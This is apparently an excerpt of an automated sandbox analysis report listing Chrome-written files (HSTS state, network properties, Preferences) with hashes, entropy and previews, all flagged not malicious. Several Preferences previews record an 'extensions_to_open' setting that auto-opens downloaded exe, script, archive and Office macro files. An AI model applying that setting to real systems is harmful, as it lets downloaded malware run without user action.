                                                                                                                                                                      Preview:{"expect_ct":[],"sts":[{"expiry":1692226344.492599,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660690344.492602},{"expiry":1692840366.794429,"host":"OuKlWsMW1dkkbI1X/oi6o0Y95ZNSWnSoeaIXAEYPlv4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1661304366.794434},{"expiry":1671576744.240044,"host":"fJjUrPqhktMfiTHJX3Q0pJi/P12Q72DBgzzJqjlNC4o=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660690344.240047},{"expiry":1692226344.186922,"host":"nAuqgR4iEWti7SOdT3UHPl6rmZU/DeaIm38P2O2OkgA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660690344.186924},{"expiry":1692226354.95696,"host":"5EdUoB7YUY9zZV+2DkgVXgho8WUvp+D+6KpeUOhNQIM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660690354.956963},{"expiry":1692226355.345309,"host":"+ccWXqaoHJ9hfuXbleKV6FQUrBlyXAJ31BdqjNQJpHs=","mode":"force-https","sts_include_subdomains":false,"sts_ob
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4133
                                                                                                                                                                      Entropy (8bit):4.884815138600978
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:HwyZGvCGXY5QxXDqr6NhRGchGh9GWXGuY/GabGmZAziuG8nXGzhS:HwMSCGY5QxXDqr6NhRTha9rXW/xbTZA1
                                                                                                                                                                      MD5:C6DC8EFB30E80210BC75BD69528AE72D
                                                                                                                                                                      SHA1:6BE12F7F25CFC2DEEC438A6040B6747BA4FE8097
                                                                                                                                                                      SHA-256:FEA450850F4F1740EADC2F9936EFDCC4D237F0580F53CB398F244635DF139E67
                                                                                                                                                                      SHA-512:34845BA6190091DDAE2C4EC13DF3C9AACD5C4C663451181EBC6B0F2002A2DB263577445A2BA87E107906DDE59033BEFD04C50D4052144FB89D1E013D3CD66031
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":1,"host":"accounts.google.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955667738","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":20454},"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955657762","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":22022},"server":"https://fonts.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955795400","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955475906","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true}
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1040
                                                                                                                                                                      Entropy (8bit):5.5482087962322515
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YYi9RAeUaM6H0UQR9rfwU5LG1KUSUaRU7Q:YhieUaM6UUPUIKUSUaU0
                                                                                                                                                                      MD5:7234253D76A91E4DE00044DD91C8575D
                                                                                                                                                                      SHA1:4FDB4EC7907E8BBEDF5C4B990D5BCB4B098F39F7
                                                                                                                                                                      SHA-256:4B7A15754168320C6064FAD7846E6CB6FC8720801465620D81845AF3BC012EC3
                                                                                                                                                                      SHA-512:E7FEF07BC52A7E3F1957DEA7D73B08609C4E547E85E40FC30D714E6F29C2A37E02BDB6AE6F431CD80E7029B464E9B3AF67D5267614B75AC7B10B5261098D163F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"expect_ct":[],"sts":[{"expiry":1692226344.492599,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660690344.492602},{"expiry":1692840422.548564,"host":"OuKlWsMW1dkkbI1X/oi6o0Y95ZNSWnSoeaIXAEYPlv4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1661304422.548568},{"expiry":1671576744.240044,"host":"fJjUrPqhktMfiTHJX3Q0pJi/P12Q72DBgzzJqjlNC4o=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660690344.240047},{"expiry":1692226344.186922,"host":"nAuqgR4iEWti7SOdT3UHPl6rmZU/DeaIm38P2O2OkgA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660690344.186924},{"expiry":1692226354.95696,"host":"5EdUoB7YUY9zZV+2DkgVXgho8WUvp+D+6KpeUOhNQIM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660690354.956963},{"expiry":1692226355.345309,"host":"+ccWXqaoHJ9hfuXbleKV6FQUrBlyXAJ31BdqjNQJpHs=","mode":"force-https","sts_include_subdomains":false,"sts_ob
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:modified
                                                                                                                                                                      Size (bytes):4166
                                                                                                                                                                      Entropy (8bit):4.886313853986977
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:HwyZGvCGXY5QxXDqr6NhRGchGh9GWXGuY/GabGmZAtG90GnnXG+hS:HwMSCGY5QxXDqr6NhRTha9rXW/xbTZAn
                                                                                                                                                                      MD5:AD8A93308EE779632ABFB8294C595CFE
                                                                                                                                                                      SHA1:278731C4AC09AD3159B10E15F1512DE72085F0B6
                                                                                                                                                                      SHA-256:A75DFEBE1428D816278864D230A071123512C5E63DBC3E4B0AD58A4984438232
                                                                                                                                                                      SHA-512:30E01BFAB52C2188EAC2B2D99881BCAA83DC87F9AFB7098BCC19D4C0BF1775029ED907D5440C284D82ED695A5958099EA2E6703B9BC35416274781EFF4883DD0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":1,"host":"accounts.google.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955667738","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":20454},"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955657762","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":22022},"server":"https://fonts.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955795400","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955475906","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true}
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4166
                                                                                                                                                                      Entropy (8bit):4.886313853986977
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:HwyZGvCGXY5QxXDqr6NhRGchGh9GWXGuY/GabGmZAtG90GnnXG+hS:HwMSCGY5QxXDqr6NhRTha9rXW/xbTZAn
                                                                                                                                                                      MD5:AD8A93308EE779632ABFB8294C595CFE
                                                                                                                                                                      SHA1:278731C4AC09AD3159B10E15F1512DE72085F0B6
                                                                                                                                                                      SHA-256:A75DFEBE1428D816278864D230A071123512C5E63DBC3E4B0AD58A4984438232
                                                                                                                                                                      SHA-512:30E01BFAB52C2188EAC2B2D99881BCAA83DC87F9AFB7098BCC19D4C0BF1775029ED907D5440C284D82ED695A5958099EA2E6703B9BC35416274781EFF4883DD0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":1,"host":"accounts.google.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955667738","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":20454},"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955657762","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":22022},"server":"https://fonts.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955795400","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955475906","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true}
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1039
                                                                                                                                                                      Entropy (8bit):5.5443911278903695
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YYi9RAeUy6H0UQ71rfwU5LG1KUSUaRU7Q:YhieUy6UUTUIKUSUaU0
                                                                                                                                                                      MD5:1F30180BDB4586537F95E6B2B92433F9
                                                                                                                                                                      SHA1:24CE6A1D7C4D604B691046B1F2009D4F4B93FA2F
                                                                                                                                                                      SHA-256:4F2EFEACFA6771154A679EEEBC4DB80BD7BB2299625704A404421AE9A644BAE0
                                                                                                                                                                      SHA-512:8AE401D0C26038ED7B541BD2268830176977B4E51BED12A7886D3CE93D3A61DC82E55263853176A97F6542AD690695A3BC982EAB79127E2710A4EB18F43868F0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"expect_ct":[],"sts":[{"expiry":1692226344.492599,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660690344.492602},{"expiry":1692840483.166416,"host":"OuKlWsMW1dkkbI1X/oi6o0Y95ZNSWnSoeaIXAEYPlv4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1661304483.16642},{"expiry":1671576744.240044,"host":"fJjUrPqhktMfiTHJX3Q0pJi/P12Q72DBgzzJqjlNC4o=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660690344.240047},{"expiry":1692226344.186922,"host":"nAuqgR4iEWti7SOdT3UHPl6rmZU/DeaIm38P2O2OkgA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660690344.186924},{"expiry":1692226354.95696,"host":"5EdUoB7YUY9zZV+2DkgVXgho8WUvp+D+6KpeUOhNQIM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660690354.956963},{"expiry":1692226355.345309,"host":"+ccWXqaoHJ9hfuXbleKV6FQUrBlyXAJ31BdqjNQJpHs=","mode":"force-https","sts_include_subdomains":false,"sts_obs
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4165
                                                                                                                                                                      Entropy (8bit):4.885268214501411
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:HwyZGvCGXY5QxXDqr6NhRGchGh9GWXGuY/GabGmZAtG90GplnXGqhS:HwMSCGY5QxXDqr6NhRTha9rXW/xbTZAV
                                                                                                                                                                      MD5:FD0F14209CA097D78C9CF3FA431D562A
                                                                                                                                                                      SHA1:80069B362FE049E3E860733FC4889D6D8CEA2B94
                                                                                                                                                                      SHA-256:B78176DCD620EF8BA7BF1722835625A08E23375770A8D94B5971DEC62DD136DE
                                                                                                                                                                      SHA-512:D3899DF564C19D56892A4681B9937E45283C79238024ED667D13F6AB2C6AEBA3201EC0B389B17EA9A4856EB84452BD99961E6CEFD90ED4D56272B803D7CA69DD
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":1,"host":"accounts.google.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955667738","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":20454},"server":"https://www.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955657762","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":22022},"server":"https://fonts.gstatic.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955795400","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755955475906","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true}
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3794
                                                                                                                                                                      Entropy (8bit):4.880923727171827
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:HwbGS/GaXGuY9GWhGhRGcf1znN+tkfr6XDqQxY5CGXXGiyZG/hS:Hwb9/xXW9rhaRTNznN+tkfr6XDqQxY5E
                                                                                                                                                                      MD5:60C973654B37597F60745F7964445A85
                                                                                                                                                                      SHA1:2EA7F3B7AC63ED6B396FAB328511C29AE6CB1969
                                                                                                                                                                      SHA-256:5DFD1D0DAE50ABBB9229D09FE39B4DE59D4358E6408856087D7A1D16CCBA5360
                                                                                                                                                                      SHA-512:DF1EB6A94412FF8F88857A1D459F674177EB33D4E75C4C6C9302DBF0F67143E01165A0721200D0C1CF878174553C881ADF1FA4D8443A53522C3A72018066BC07
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"net":{"http_server_properties":{"broken_alternative_services":[{"broken_count":1,"host":"accounts.google.com","isolation":[],"port":443,"protocol_str":"quic"}],"servers":[{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755944492339","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":19786},"server":"https://www.googletagmanager.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755945937080","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":24797},"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755944724865","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":22536},"server":"https://www.google-analytics.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13307755949044836","port":443,"protocol_str":"quic"}],"isolation":[],"netwo
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1039
                                                                                                                                                                      Entropy (8bit):5.5443911278903695
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:YYi9RAeUy6H0UQ71rfwU5LG1KUSUaRU7Q:YhieUy6UUTUIKUSUaU0
                                                                                                                                                                      MD5:1F30180BDB4586537F95E6B2B92433F9
                                                                                                                                                                      SHA1:24CE6A1D7C4D604B691046B1F2009D4F4B93FA2F
                                                                                                                                                                      SHA-256:4F2EFEACFA6771154A679EEEBC4DB80BD7BB2299625704A404421AE9A644BAE0
                                                                                                                                                                      SHA-512:8AE401D0C26038ED7B541BD2268830176977B4E51BED12A7886D3CE93D3A61DC82E55263853176A97F6542AD690695A3BC982EAB79127E2710A4EB18F43868F0
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"expect_ct":[],"sts":[{"expiry":1692226344.492599,"host":"M4bfUnCmQAi4PNb3B8aI/2+SVJhHKsMfMMT7fzi6ij4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660690344.492602},{"expiry":1692840483.166416,"host":"OuKlWsMW1dkkbI1X/oi6o0Y95ZNSWnSoeaIXAEYPlv4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1661304483.16642},{"expiry":1671576744.240044,"host":"fJjUrPqhktMfiTHJX3Q0pJi/P12Q72DBgzzJqjlNC4o=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1660690344.240047},{"expiry":1692226344.186922,"host":"nAuqgR4iEWti7SOdT3UHPl6rmZU/DeaIm38P2O2OkgA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660690344.186924},{"expiry":1692226354.95696,"host":"5EdUoB7YUY9zZV+2DkgVXgho8WUvp+D+6KpeUOhNQIM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1660690354.956963},{"expiry":1692226355.345309,"host":"+ccWXqaoHJ9hfuXbleKV6FQUrBlyXAJ31BdqjNQJpHs=","mode":"force-https","sts_include_subdomains":false,"sts_obs
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8661
                                                                                                                                                                      Entropy (8bit):5.118148779025328
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:MXrp1X9l88yy+FqkkwTvb+klmFHlphbjAQqtjEsXtSct:MX3HyxqGTvb2YtIsXtSct
                                                                                                                                                                      MD5:FB267A67AD01B624121CC4EF3981317F
                                                                                                                                                                      SHA1:FC6F6748E26488645CBB5C4DCC9A83775744C5F9
                                                                                                                                                                      SHA-256:5EF3DA2323E30A0539B267928366A7061D7A339C02FFE717FE9AC58FAB51C0FA
                                                                                                                                                                      SHA-512:9337FDDC68CFFEA6206C8765C512A4BDC4EBAFAC88CE1DBB95C535734BD857083D9885D3D57CFCE39B2AA6856E1F994F06E267B5DFF15F800E47A229FF3AAE9D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"NewTabPage":{"PrevNavigationTime":"13305163954375440"},"account_tracker_service_last_update":"13305777957856249","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777957848078"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):14764
                                                                                                                                                                      Entropy (8bit):5.567950834758074
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:384:sZMLl2Xt1kXqKf/pUZNCgVLH2HftWrUxafFM4J:nLlct1kXqKf/pUZNCgVLH2HfkrUgfa2
                                                                                                                                                                      MD5:FD9F0D34D1FBA5549859C8254AA91098
                                                                                                                                                                      SHA1:2C766EC3488842659E51201BA47A35D71179C6C4
                                                                                                                                                                      SHA-256:3DEBA4EEB3BEBA931313F331E9F94AADCDBD6E61ED9AD97920A49D86D540B357
                                                                                                                                                                      SHA-512:84D10A89D9DF91881D983C9632288F6F3D2A5AE29A1C93301E7A671017EF61EE7303D722D25FA84462B411F1B7B2BA71B8F1EF4C06234E8BCB76CF472230496D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz"},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13305777956651605","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"web
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):33
                                                                                                                                                                      Entropy (8bit):4.900306619292897
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3:+iIdIE2XHWMiG:+ZoXWMiG
                                                                                                                                                                      MD5:C75EEF9412F25C7CDC5877F63D7956DD
                                                                                                                                                                      SHA1:17E2E49D2D6E012A9240B0FAF02FBC9CC19EF151
                                                                                                                                                                      SHA-256:34BC619EAE635BB84A4B98710015EF319400521CFA83B95A232F4251D4ECFD4B
                                                                                                                                                                      SHA-512:CDE780401698BE2CB6ACF862DCCD58B3C3244760E2660C128C8356D7C513E4F8BBCC0082987D12D35295F179632C88199DF433522BFA006B5405C399C135C786
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:v10...qr.y.........m.S."..|F.GR.
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8661
                                                                                                                                                                      Entropy (8bit):5.118148779025328
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:MXrp1X9l88yy+FqkkwTvb+klmFHlphbjAQqtjEsXtSct:MX3HyxqGTvb2YtIsXtSct
                                                                                                                                                                      MD5:FB267A67AD01B624121CC4EF3981317F
                                                                                                                                                                      SHA1:FC6F6748E26488645CBB5C4DCC9A83775744C5F9
                                                                                                                                                                      SHA-256:5EF3DA2323E30A0539B267928366A7061D7A339C02FFE717FE9AC58FAB51C0FA
                                                                                                                                                                      SHA-512:9337FDDC68CFFEA6206C8765C512A4BDC4EBAFAC88CE1DBB95C535734BD857083D9885D3D57CFCE39B2AA6856E1F994F06E267B5DFF15F800E47A229FF3AAE9D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"NewTabPage":{"PrevNavigationTime":"13305163954375440"},"account_tracker_service_last_update":"13305777957856249","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777957848078"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8515
                                                                                                                                                                      Entropy (8bit):5.117689010228945
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:MXrp1X9q88yy+FqTkqrSb+klmFHlphbjAQqtjEsXtSct:MX3iyxqtrSb2YtIsXtSct
                                                                                                                                                                      MD5:B00545064D757B5D341DC1E8B7933AFA
                                                                                                                                                                      SHA1:EDB4C77B9873F7C6C562243143C54058040666A7
                                                                                                                                                                      SHA-256:DCEC3A3C0EB5A47A04AFCD130C3ABCE815385492C70A9D96DEC92FE3184CA143
                                                                                                                                                                      SHA-512:45DBFAC590DA266AFAD40572B3070AE2E9C8D6175E3FBE05ABDC37D87067D3BF09476B01A312B546AE2320C476C4A9F26852C4437C0B9541F4D027F2DB69A36B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"NewTabPage":{"PrevNavigationTime":"13305163954375440"},"account_tracker_service_last_update":"13305777957856249","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777957848078"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8662
                                                                                                                                                                      Entropy (8bit):5.118234727482005
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:MXrp1X9l88yy+FqTkqrpb+klmFHlphbjAQqtjEsXtSct:MX3Hyxqtrpb2YtIsXtSct
                                                                                                                                                                      MD5:7D36D9C51CB7FB2F20C96C9D61D9B102
                                                                                                                                                                      SHA1:ACCCB8E9C7CEA42546A6374813AA68ED327FEB8B
                                                                                                                                                                      SHA-256:2DDD243FF115331723679D0B3A1D6FE2055F4BB1588B2CC03C11D79A2EC15AAF
                                                                                                                                                                      SHA-512:FA1B63A6D6796B1D4FD0A536BAFD7DCE504D80245B893CD4BCA0CB2047D8C0365688F264B1E575754351E24FE334981B3FCD2AB567A520C76AFF2618A2051520
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                      Preview:{"NewTabPage":{"PrevNavigationTime":"13305163954375440"},"account_tracker_service_last_update":"13305777957856249","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245952891998324","autocomplete":{"retention_policy_last_version":104},"autofill":{"orphan_rows_removed":true},"browser":{"has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"default_apps_install_state":3,"domain_diversity":{"last_reporting_timestamp":"13305777957848078"},"download":{"always_open_pdf_externally":true,"directory_upgrade":true,"extensions_to_open":"pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:
                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                      File Type:ASCII text, with very long lines, with no line terminators
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8451
                                                                                                                                                                      Entropy (8bit):5.116728466798495
                                                                                                                                                                      Encrypted:false
